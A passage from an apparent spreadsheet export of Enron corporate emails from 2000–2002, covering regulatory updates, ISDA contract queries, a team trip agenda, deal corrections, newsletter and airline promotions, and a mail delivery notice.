Lovell Pinkney held the UT freshman record. He had 458 yards as a freshman_x000D_
in_x000D_
1992. Johnson needs just 13 yards to pass Pinkney. . . The Longhorns are a_x000D_
10-point favorite over Texas Tech. . . Only 7 of the players on UT's 44-man_x000D_
depth chart are seniors._x000D_
* * * *_x000D_
My next e-mail/fax will be whenever events warrant._x000D_
* * * *_x000D_
The True Orange Fax Service includes  at  least  99 faxes  a year and costs_x000D_
$99 ($79 by E-Mail). The True Orange Newsletter includes  26 newsletters_x000D_
and_x000D_
is published weekly during football season and twice monthly during most of_x000D_
the other months. It costs $45. Save by subscribing to both for $130 (or_x000D_
$110_x000D_
if you take the faxes via E-Mail  or $99 if you take the faxes and_x000D_
newsletter_x000D_
via E-Mail). Send check  to address at the top of page. I also  update my_x000D_
900 number ? 1-900-288-8839 ? daily with recruiting news. My E-Mail address_x000D_
is: truorange@aol.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 09:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.c.williams@enron.com', 'harry.kingerski@enron.com', 'msmith1@enron.com', 'robert.frank@enron.com', 'james.d.steffes@enron.com', 'tjohnso8@enron.com', 'sstoness@enron.com', 'smara@enron.com', 'leslie.lawner@enron.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>CPUC Proceedings -- Weekly Update</t>
  </si>
  <si>
    <t>Attached is the weekly update of ongoing matters before the CPUC.  Not much_x000D_
has changed since last week, with the major items of interest being_x000D_
contained within the UDCs' rate stabilization docket (A. 00-11-038, et al)._x000D_
As usual, if there are any questions or comments please call me._x000D_
_x000D_
 &lt;&lt;X20615.DOC&gt;&gt;_x000D_
_x000D_
Jeanne Bennett_x000D_
_x000D_
 - X20615.DOC</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 14:22:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gerald.gilbert@enron.com', 'don.baughman@enron.com', 'joe.errigo@enron.com', 'peter.makkai@enron.com', 'lloyd.will@enron.com', 'juan.hernandez@enron.com', 'dean.laurent@enron.com', 'kayne.coulter@enron.com', 'steve.olinde@enron.com', 'joe.stepenovitch@enron.com'})</t>
  </si>
  <si>
    <t>Viva Las Vegas</t>
  </si>
  <si>
    <t>Well guys...the time has come.  Here is the Agenda and a few reminders for the Las Vegas Trip:_x000D_
_x000D_
 _x000D_
_x000D_
There will be a shuttle that will pick you up in front of the building on Thurs., 10/4/01...IT WILL LEAVE ENRON AT 9:30AM.  Please do NOT be late.  We want to make sure that we do not have any problems at the airport.  _x000D_
_x000D_
Please make sure that you bring your Vitol Travel Receipt with you and your valid Id.  _x000D_
_x000D_
Please note that there will be ONLY a few people who have authorization to use their Amex Cards while the group is out in the evenings.  This means that when we return those people will be authorized to turn in expense reports.  Remember guys, we do have a budget that I am accountable for.  The following people are:_x000D_
_x000D_
Don Baughman_x000D_
Juan Hernandez_x000D_
Joe Stepenovitch_x000D_
Lloyd Will_x000D_
_x000D_
I will meet you at check in and confirm your Spa time, if you have any questions or concerns please feel free to contact me._x000D_
_x000D_
Thanks for your patience,_x000D_
_x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 11:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Columbia/New Power Asset Purchase</t>
  </si>
  <si>
    <t>Mark:_x000D_
I received a notice in the mail in connection with Columbia Energy Services _x000D_
Corporation's sale of its "Mass Markets" business to The New Power Company.  _x000D_
The purpose of the notice was to inform us that effective July 31, 2000 _x000D_
Columbia would be assigning its interest in the January 30, 1998 ISDA Master _x000D_
Agreement that it has with ENA to New Power as well as all transactions under _x000D_
it.  Please call me if you have any questions about this.  I expect that we _x000D_
will receive shortly a formal consent agreement._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Sun, 28 Oct 2001 02:33:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'crushmaster@crushlink.com'})</t>
  </si>
  <si>
    <t>CrushLink &gt; Get this WILD HINT!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
CrushLink     Hello Joe,  We have a WILD HINT for you... you don't want to miss this one!!  Just click to:  http://www.CrushLink.com/wildhint.php3   Have fun!  Sincerely, The Crush Master  ---  PS. We thought you'd like this opportunity since you're a CrushLink user; you can block further messages @ http://www.CrushLink.com/block.php3   	_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 01:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ABX1 60</t>
  </si>
  <si>
    <t>ABX1 60 (Hertzberg) was just scheduled for hearing this afternoon in the_x000D_
Assembly Energy, Costs and Availability Committee.  In brief, the bill_x000D_
does the following:_x000D_
_x000D_
Require, as a condition of certification by the CEC, that an applicant_x000D_
offer to sell to an electrical_x000D_
corporation, a municipal corporation, or the Department of Water_x000D_
Resources, at a just and reasonable cost base price electrical power_x000D_
generated by the facility._x000D_
_x000D_
This bill would also prohibit a person or entity, as defined, from_x000D_
operating an electrical generation facility unless the person or entity_x000D_
has submitted to the commission, within the time prescribed by_x000D_
regulations adopted by the commission, a maintenance and outage_x000D_
schedule, and the commission has approved that schedule._x000D_
_x000D_
http://info.sen.ca.gov/pub/bill/asm/ab_0051-0100/abx1_60_bill_20010216_introdu_x000D_
ced.pdf</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 15:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: First Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the update._x000D_
m_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robert C Williams@ENRON_DEVELOPMENT_x000D_
10/30/2000 01:40 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: First Gas_x000D_
_x000D_
Privileged and Confidential Attorney-Client Communication_x000D_
_x000D_
Mike Brown, David Terlip, Janice Moore and I met today.  Plan is for Mike to _x000D_
get an answer from Siemens (probably this week or next) on spec.  If Siemens _x000D_
amenable to relax First Gas' spec to plant, request First Gas to relax it's _x000D_
spec to us.  Mike will report to you as soon as he has heard from Siemens.   _x000D_
If either Siemens or First Gas recalcitrant, move to litigation strategy.  _x000D_
This would mean at next cargo delivery (due mid-November):  (1)  if cargo _x000D_
"off spec" demand separate test using "ashing" technique (more likely to _x000D_
pass) and if it passes using "ashing" declare on spec and arbitrate dispute _x000D_
over acceptance of "ashing" as industry standard; (2) if cargo rejected _x000D_
(either because First Gas refuses to accept "ashing" or because off spec even _x000D_
with "ashing") resale cargo and force First Gas to locate alternative _x000D_
supplies; dispute First Gas invoice for cost of cover.   Mike mentioned a _x000D_
possible dispute over storage which could also arise with the next delivery.  _x000D_
This could bring us into a dispute with First Gas even if the cargo is on _x000D_
spec._x000D_
_x000D_
Our plan is to get back to you in any event next week when you return with a _x000D_
status report._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Cheers.  And congratulations on the Sooners' win._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 03:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENW Staff Meeting, 2/22/01</t>
  </si>
  <si>
    <t xml:space="preserve">Please change location of this meeting for this week only.  I would also _x000D_
change the notation for this recurring meeting to ENW Staff Meeting with _x000D_
Philippe with Peggy McCurley as the contact.  Thanks. _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 02/20/2001 11:00 AM _x000D_
---------------------------_x000D_
From: Peggy McCurley/ENRON@enronXgate on 02/20/2001 10:35 AM_x000D_
To: Harry Arora/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, David _x000D_
Berberian/ENRON@enronXgate, Bill W Brown/ENRON@enronXgate, Dan _x000D_
Bruce/ENRON@enronXgate, Stephen H Douglas/HOU/ECT@ECT, Jay _x000D_
Fitzgerald/NY/ECT@ECT, Thomas D Gros/ENRON@enronXgate, Robert _x000D_
Jones/Corp/Enron@ENRON, Greg Piper/ENRON@enronXgate, Kerry _x000D_
Roper/ENRON@enronXgate, Rex Shelby/ENRON@enronXgate, Mark Taylor/HOU/ECT@ECT, _x000D_
Lisa Yoho/NA/Enron@Enron, Andy Zipper/ENRON@enronXgate_x000D_
cc: Lydia Cannon/ENRON@enronXgate, Rosie Castillo/ENRON@enronXgate, Brenda _x000D_
Flores-Cuellar/ENRON@enronXgate, Irma Fuentes/ENRON@enronXgate, Holly _x000D_
Keiser/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Diane Latson/ENRON@enronXgate, _x000D_
Barbara Lewis/HOU/ECT@ECT, Lydia Reeves/HOU/ECT@ECT, Tina _x000D_
Spiller/ENRON@enronXgate, Patti Thompson/HOU/ECT@ECT, Mary _x000D_
Weatherstone/ENRON@enronXgate _x000D_
Subject: ENW Staff Meeting, 2/22/01_x000D_
_x000D_
The ENW Staff meeting for Thursday(02/22) will be held in EB2751 for this _x000D_
week only,  from 12:00-1:30 pm._x000D_
_x000D_
The dial in numbers are:_x000D_
National dial in 1-888-285-4585_x000D_
International dial in 1-304-345-7354_x000D_
Participant Code: 494963_x000D_
Host Code: 119283 (Philippe)_x000D_
_x000D_
Please let me know if you are unable to attend._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Peggy_x000D_
x31832_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Mar 2002 06:23:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'especials@specials.swavacations.com'})</t>
  </si>
  <si>
    <t>Friends Fly Free Just Announced!</t>
  </si>
  <si>
    <t>=======================================================================_x000D_
_x000D_
Southwest Airlines Vacations has just announced FRIENDS FLY FREE to_x000D_
Las Vegas, Reno/Lake Tahoe, and Orlando!  We are sending this special_x000D_
e-mail to our valued e-mail Subscribers to provide you with_x000D_
information about this great sale._x000D_
_x000D_
We would LUV to see you on a vacation with us soon and hope you take_x000D_
advantage of these special savings!_x000D_
_x000D_
=======================================================================_x000D_
_x000D_
FRIENDS FLY FREE TO LAS VEGAS, RENO/LAKE TAHOE, AND ORLANDO!_x000D_
_x000D_
Celebrate friendship with Friends Fly Free from Southwest Airlines_x000D_
Vacations!_x000D_
_x000D_
This special offer is available when you purchase a complete Air/Hotel_x000D_
or Air/Car vacation package to Las Vegas, Reno/Lake Tahoe, or_x000D_
Orlando by April 8, 2002, for travel April 2 through August 3, 2002._x000D_
_x000D_
The following applies to this promotion:_x000D_
- Fare does not include a $3 federal excise tax per takeoff and landing_x000D_
  per fare-paying Customer_x000D_
- Fare does not include airport taxes of up to $18 roundtrip per_x000D_
  person and government-imposed September 11th Security Fee of up to_x000D_
  $10 roundtrip per person._x000D_
_x000D_
Customize a vacation package for you and your Friend today!_x000D_
_x000D_
For more information on this special offer and to create your_x000D_
vacation package, visit_x000D_
_x000D_
http://www.swavacations.com/fffemail.htm_x000D_
_x000D_
_______________________________________________________________________x000D_
_x000D_
Please share this great vacation information with your Friends._x000D_
To subscribe to our weekly e-mail specials, visit_x000D_
_x000D_
http://www.swavacations.com/espec/espec.htm_x000D_
________________________________________________________________________x000D_
_x000D_
The Mark Travel Corporation is the tour operator for_x000D_
Southwest Airlines Vacations._x000D_
________________________________________________________________________x000D_
_x000D_
If you wish to unsubscribe from these e-mail specials please visit:_x000D_
http://www.swavacations.com/unsub.htm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
OT: sscott5@ENRON.COM</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 14:47:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'denver.plachy@enron.com', 'lisa.kinsey@enron.com', 'jad.doan@enron.com', 'bruce.mills@enron.com', 'kevin.ruscitti@enron.com', 'richard.tomaski@enron.com', 'edward.brady@enron.com', 'hal.mckinney@enron.com', 'brad.jones@enron.com', 'sladana-anna.kulic@enron.com', 'trading &lt;.williams@enron.com&gt;', 'geoff.storey@enron.com'})</t>
  </si>
  <si>
    <t>TRV Notification:  (CE P/L - 10/08/2001)</t>
  </si>
  <si>
    <t>The report named: CE P/L &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=4&amp;report_name=CE+P/L&amp;category_cd=3&amp;category_name=CENTRAL&amp;toc_hide=1&amp;sTV1=3&amp;TV1Exp=Y&amp;current_efct_date=10/08/2001&gt;, published as of 10/08/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 04:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'matthew.allan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'yumi.takei@enron.com'})</t>
  </si>
  <si>
    <t>Re: ISDA- Koch Energy Trading Inc</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Yumi,_x000D_
_x000D_
Yes I realise the entities are going to be different if this turns out to be _x000D_
a ENA ISDA but the by already having an ISDA with the counterparty we can _x000D_
quicken the negotiation process, i.e. 'mirroring' the contract as you say, _x000D_
and having the correct entities in place. Thats what I am proposing we do. _x000D_
This is something we'll need to work with Martin on._x000D_
_x000D_
Thanks_x000D_
_x000D_
Matthew_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Yumi Takei_x000D_
09/11/2000 12:38_x000D_
To: Matthew Allan/LON/ECT@ECT_x000D_
cc: Anthony Campos/HOU/ECT@ECT, Gail Hill/LON/ECT@ECT, Martin _x000D_
Rosell/OSL/ECT@ECT, Tana Jones/HOU/ECT@ECT, Matthew Dawson/LON/ECT@ECT, _x000D_
European Contract Management, Martin Rosell/OSL/ECT@ECT _x000D_
_x000D_
Subject: Re: ISDA- Koch Energy Trading Inc  _x000D_
_x000D_
Hi Matt,_x000D_
_x000D_
I believe we may need to set up a new ISDA since ECTRIC is a different entity _x000D_
than ENA.  In the past we have mirrored an existing ENA ISDA in order to _x000D_
create one between the CP and ECTRIC.  However, I'll wait to turn in any _x000D_
requests until I hear what we already have with Koch._x000D_
_x000D_
Thank you,_x000D_
Yumi_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Matthew Allan                           09/11/2000 13:26_x000D_
	_x000D_
_x000D_
To: Anthony Campos/HOU/ECT@ECT_x000D_
cc: Gail Hill/LON/ECT@ECT, Martin Rosell/OSL/ECT@ECT, Tana Jones/HOU/ECT@ECT, _x000D_
Yumi Takei/OSL/ECT@ECT, Matthew Dawson/LON/ECT@ECT, European Contract _x000D_
Management _x000D_
_x000D_
Subject: Re: ISDA- Koch Energy Trading Inc_x000D_
_x000D_
Hi Anthony,_x000D_
_x000D_
Can you do me a favour and take a look into this ISDA. The traders in our _x000D_
Oslo office have done a weather deal with Koch Energy Trading Inc.  The _x000D_
counterparty mentioned they had an ISDA in place with ECTRIC. We are trading _x000D_
as ECTRIC.   But maybe the CP was confused and thought it was ECTRIC instead _x000D_
of ENA._x000D_
_x000D_
The trader here said she plans to do many more future trades with Koch, and _x000D_
has been asking if we can amend the ENA ISDA to cover Oslo._x000D_
_x000D_
If you can just confirm what you've got, whats covered etc and if possible _x000D_
send through a copy and I can liaise with Oslo and our legal dept to get them _x000D_
covered._x000D_
_x000D_
Thanks_x000D_
_x000D_
Matthew_x000D_
830 36840_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Matthew Allan/LON/ECT on 09/11/2000 10:36 _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
	Enron Europe_x000D_
	_x000D_
	From:  Stephen Furter                           09/11/2000 10:24_x000D_
	_x000D_
_x000D_
To: Matthew Allan/LON/ECT@ECT_x000D_
cc: Matthew Dawson/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: ISDA- Koch Energy Trading Inc  _x000D_
_x000D_
Matt,_x000D_
_x000D_
I spoke to Matthew Dawson, and he said there is an old ISDA out there, with _x000D_
an effective &amp; contract date of 23 May 1994 with ECT._x000D_
It was apparently negotiated in Houston, and the contact there is Tana Jones._x000D_
_x000D_
There is no copy here in London, but Matt said he would ask Tana, if we could _x000D_
see one._x000D_
_x000D_
Regards_x000D_
Stephen  (Ext:34716)_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Matthew Allan                           09/11/2000 10:03_x000D_
	_x000D_
_x000D_
To: Stephen Furter/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: ISDA- Koch Energy Trading Inc_x000D_
_x000D_
Steve,_x000D_
_x000D_
Do we have anything out there for this....should be an ISDA._x000D_
_x000D_
Dig out anything and everything we've got and send it through _x000D_
_x000D_
cheers_x000D_
_x000D_
matt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 08:31:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mario.alonso@enron.com', 'joel.bennett@enron.com', 'adam.giannone@enron.com', 'matthew.james@enron.com', 'jason.brent@enron.com', 'doug.gichana@enron.com', 'joonhee.rhee@enron.com', 'stewart.range@enron.com', 'ermes.melinchon@enron.com', 'e.taylor@enron.com', 'andre.cangucu@enron.com', 'ernesto.garza@enron.com', 'barry.pearce@enron.com', 'marc.poulson@enron.com', 'luis.velez@enron.com', 'e-mail &lt;.moises@enron.com&gt;', 'gabriel.monroy@enron.com', 'paul.gregory@enron.com', 'alper.sunar@enron.com', 'russell.servat@enron.com', 'richard.cross@enron.com', 'houston &lt;.perez@enron.com&gt;', 'peter.bennett@enron.com', 'felipe.jens@enron.com'})</t>
  </si>
  <si>
    <t>FW: schedule .....</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the schedule for tomorrow._x000D_
We are playing at 8:45 at Cullen._x000D_
Please respond and let me know if you can play.(Respond to me and not Paul)_x000D_
If you have not paid your registration fee please do so now. If you do not pay your registration fee you would not be able to play after the first game._x000D_
Thanks_x000D_
_x000D_
Justin Rostant _x000D_
Enron Financial Trading Desk. _x000D_
Phone: 713-853-6460 _x000D_
Mobile: 832-264-6333 _x000D_
Fax: 713-646-3239 _x000D_
_x000D_
 _x000D_
weather permitting:   281-398-2229 (1)  .....  (@ 4.30 pm ...)  _x000D_
 _x000D_
mosquitos .......mosquitos .......mosquitos .......mosquitos .......mosquitos ......._x000D_
**********************************************_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 14 May 2001 07:46:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'godfrey.hyde@enron.com'})</t>
  </si>
  <si>
    <t>FW: PX PAYMENT</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stokley, Chris  _x000D_
Sent:	Monday, May 14, 2001 7:08 AM_x000D_
To:	Confer, Mark_x000D_
Subject:	PX PAYMENT_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 04:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ferickson@cal.stikeman.com'})</t>
  </si>
  <si>
    <t>Re: Coffee, sugar and cocoa Online Products</t>
  </si>
  <si>
    <t>I have attached hereto a copy of our memorandum dated September 20, 1999 _x000D_
which had previously been provided to Mark Taylor setting forth our analysis _x000D_
of Canadian (Alberta/Ontario) legal/regulatory issues concerning the entering _x000D_
into of commodity based OTC products by Enron with counterparties on line _x000D_
through what was then Enron's proposed internet based trading system.  The _x000D_
proposed extension of that system to coffee, sugar and cocoa swaps/options _x000D_
does not present any unique issues under Alberta or Ontario laws._x000D_
_x000D_
Note that in reviewing the Septermber 20, 1999 memorandum, the Proposed Rule _x000D_
of the Ontario Securities Commission on OTC derivatives (which was not in _x000D_
effect as at the time of that memorandum) was eventually not implemented; _x000D_
accordingly, that part of the discussion regarding the Proposed Rule can be _x000D_
ignored.  Moreover, I understand that Ontario has, subsequent to the date of _x000D_
that memorandum, adopted the Uniform Electronic Commerce Act published by the _x000D_
Uniform Law Conference of Canada  which is based on the United Nations Model _x000D_
Law on Electronic Commerice and which, in short, gives legal efficacy to _x000D_
electronic documents and contracts.  Alberta has not yet adopted such _x000D_
legislation._x000D_
_x000D_
I trust this is satisfactory for your purposes.  Please contact me should you _x000D_
require anything further.  Regards._x000D_
_x000D_
&gt;&gt;&gt; &lt;Robert.Bruce@enron.com&gt; 04/19/01 05:36PM &gt;&gt;&gt;_x000D_
Fred, as a follow-up to our telephone conversation, we would like to launch_x000D_
some new products on EnronOnline -- swaps on coffee, sugar and cocoa (the_x000D_
agricultural "softs").  We would like to know if Canadian law presents any_x000D_
sort of restrictions or other issues with respect to financially settled_x000D_
derivatives on these commodities.  We would like an analysis with respect_x000D_
to both swaps and options (however, if timing becomes an issue, we should_x000D_
concentrate on swaps, as our offering of swaps is more imminent)._x000D_
_x000D_
We are looking at rolling out with nine products -- for each of the three_x000D_
commodities, there will be a calendar-month swap tied to (i) the New York_x000D_
Board of Trade price, (ii) the LIFFE price, and (iii) the spread between_x000D_
the two exchange prices._x000D_
_x000D_
We would like the results of your analysis by April 27.  Please feel free_x000D_
to call me with any comments or questions you may have.  Thank you for your_x000D_
assistance with this -- Bob Bruce_x000D_
_x000D_
_x000D_
Robert E. Bruce_x000D_
Senior Counsel_x000D_
Enron Wholesale Services_x000D_
T (713) 345-7780_x000D_
F (713) 646-3393_x000D_
robert.bruce@enron.com_x000D_
_x000D_
_x000D_
 - 2rtb05!.DOC</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 11:03:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>Done_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McLaughlin Jr., Errol  _x000D_
Sent:	Thursday, May 24, 2001 12:50 PM_x000D_
To:	Taylor, Joey_x000D_
Subject:	FW: DEAL #1246131 from 5-15-2001_x000D_
Importance:	Low_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Thursday, May 24, 2001 7:19 AM_x000D_
To:	Quigley, Dutch; McLaughlin Jr., Errol_x000D_
Subject:	FW: DEAL #1246131 from 5-15-2001_x000D_
Importance:	Low_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Gencheva, Daniela" &lt;GencheDI@er.oge.com&gt;@ENRON [mailto:IMCEANOTES-+22Gencheva+2C+20Daniela+22+20+3CGencheDI+40er+2Eoge+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, May 23, 2001 10:09 AM_x000D_
To:	Arnold, John_x000D_
Cc:	Brooks, Margaret_x000D_
Subject:	DEAL #1246131 from 5-15-2001_x000D_
Importance:	Low_x000D_
_x000D_
During a telephone conversation with Margaret Brooks, on May 15th, you_x000D_
agreed to change the terms of deal #1246131  buying 10,000/day Gas Daily_x000D_
HHub @$4.49 and replace it with a buy of 10,000/day NYMEX Swap @$4.495. We_x000D_
still have not received a confirmation with the corrected terms._x000D_
Would you correct the price in your system or inform your contract_x000D_
administrator of the correction._x000D_
If you have any questions please feel free to contact me or Margaret brooks_x000D_
at 405-553-6471._x000D_
_x000D_
_x000D_
_x000D_
Daniela Gencheva_x000D_
Energy Trading Analyst II_x000D_
OGE Energy Resources_x000D_
TEL: 405-553-6486_x000D_
FAX: 405-553-6498</t>
  </si>
  <si>
    <t>Fri, 3 Mar 2000 05:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'tana.jones@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'susan.flynn@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Repo Agreements - Tax Department</t>
  </si>
  <si>
    <t xml:space="preserve">I was in a meeting with Jordan and Steve yesterday and the topic of Repo _x000D_
Agreements came up. With regard to all future Repo Agreements, Jordan asked _x000D_
that we contact Steve Douglas in the Tax Department each time we are _x000D_
requested to negotiate a new Repo Agreement.   </t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 14:09:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timmy.ng@enron.com'})</t>
  </si>
  <si>
    <t>Good luck</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Skilling,_x000D_
_x000D_
As with the many employees here at Enron, I wish you all the best ahead. I'm sorry to hear you leave but I know you have your reasons. I'm sure_x000D_
we all can respect that._x000D_
_x000D_
I just wanted to send you a note to say thanks again for the things you've done for me since last summer. They're greatly appreciated. Hopefully, I will have the chance to meet with you again._x000D_
_x000D_
Wishing you the best and hopefully I will see you again...._x000D_
_x000D_
Kindest regards,_x000D_
_x000D_
Tim Ng_x000D_
Analyst_x000D_
x30998_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 07:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'jdasovic@ees.enron.com', 'mike.smith@enron.com', 'james.keller@enron.com', 'harry.kingerski@enron.com', 'mona.petrochko@enron.com', 'richard.sanders@enron.com', 'sandra.mccubbin@enron.com', 'tim.belden@enron.com', 'christi.nicolay@enron.com', 'christian.yoder@enron.com', 'james.steffes@enron.com', 'dennis.benevides@enron.com', 'steve.c.hall@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'donna.fulton@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>Revised Section 206 Motion</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the cover motion for the section 206 white paper.  We will be _x000D_
filing this tomorrow.  Please remember that due to the time zone, and the _x000D_
time necessary for copying, etc., any comments should be made first thing _x000D_
tomorrow morning.  Thanks.  Ron- please note a few minor edits in redline _x000D_
/strikeout._x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 10/17/2000 01:22 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;                           _x000D_
10/17/2000 01:10 PM_x000D_
	_x000D_
_x000D_
To: &lt;mary.hain@enron.com&gt;, &lt;seabron.adamson@frontier-economics.com&gt;_x000D_
cc:  _x000D_
Subject: Revised Motion_x000D_
_x000D_
_x000D_
Please review the attached and give me your comments ASAP.  I would like to _x000D_
file tomorrow.  Seab: Please read carefully for economic content._x000D_
_x000D_
Mary: I incorporated your comments from last night along with the matters _x000D_
that we discussed by phone yesterday.  However, I just received your fax and _x000D_
wanted to get this moving since incorporating those edits would slow down the _x000D_
process by several edits.  I'll take a look at your edits while you review _x000D_
the attached._x000D_
_x000D_
Ron_x000D_
_x000D_
_x000D_
_x000D_
 - 0132257.01_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 02:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Site License for Power World</t>
  </si>
  <si>
    <t>I concur.</t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 08:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Why are you congradulating me, I work for Delainey.</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 12:36:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'postmaster@sims1.rcsntx.swbell.net'})</t>
  </si>
  <si>
    <t>Delivery Notification: Delivery has been successful</t>
  </si>
  <si>
    <t>This report relates to a message you sent with the following header fields:_x000D_
_x000D_
  Message-id:_x000D_
   &lt;3891F8E98C93214B9E3E913CB7BF600220DBAE@NAHOU-MSMBX03V.corp.enron.com&gt;_x000D_
  Date: Fri, 19 Oct 2001 14:10:30 -0500_x000D_
  From: "Keavey, Peter F." &lt;Peter.F.Keavey@enron.com&gt;_x000D_
  To: "Dowjones1 (E-mail)" &lt;dina.omeara@dowjones.com&gt;,_x000D_
   "Dowjones2 (E-mail)" &lt;john.edmiston@dowjones.com&gt;,_x000D_
   "Gas Daily (E-mail)" &lt;gas_daily@ftenergy.com&gt;,_x000D_
   "Iferc1 (E-mail)" &lt;kelley_doolan@mcgraw-hill.com&gt;,_x000D_
   "Iferc2 (E-mail)" &lt;liane_kucher@mcgraw-hill.com&gt;,_x000D_
   "NGI (E-mail)" &lt;prices@intelligencepress.com&gt;_x000D_
_x000D_
Your message has been successfully delivered to the following recipients:_x000D_
_x000D_
  Recipient address: rogertan@sims1.rcsntx.swbell.net_x000D_
  Reason: Message accepted by the message store_x000D_
_x000D_
_x000D_
 - C.DTF _x000D_
Return-path: Peter.F.Keavey@enron.com_x000D_
Delivery-receipt-to: "Keavey, Peter F." &lt;Peter.F.Keavey@ENRON.com&gt;_x000D_
Disposition-notification-to: "Keavey, Peter F." &lt;Peter.F.Keavey@ENRON.com&gt;_x000D_
Received: from sims-ms-daemon by sims1.rcsntx.swbell.net_x000D_
 (Sun Internet Mail Server sims.3.5.2000.01.05.12.18.p9)_x000D_
 id &lt;0GLG00J1VX4SMK@sims1.rcsntx.swbell.net&gt;; Fri,_x000D_
 19 Oct 2001 14:36:28 -0500 (CDT)_x000D_
Received: from mta1.rcsntx.swbell.net (mta1-pr.rcsntx.swbell.net)_x000D_
 by sims1.rcsntx.swbell.net_x000D_
 (Sun Internet Mail Server sims.3.5.2000.01.05.12.18.p9)_x000D_
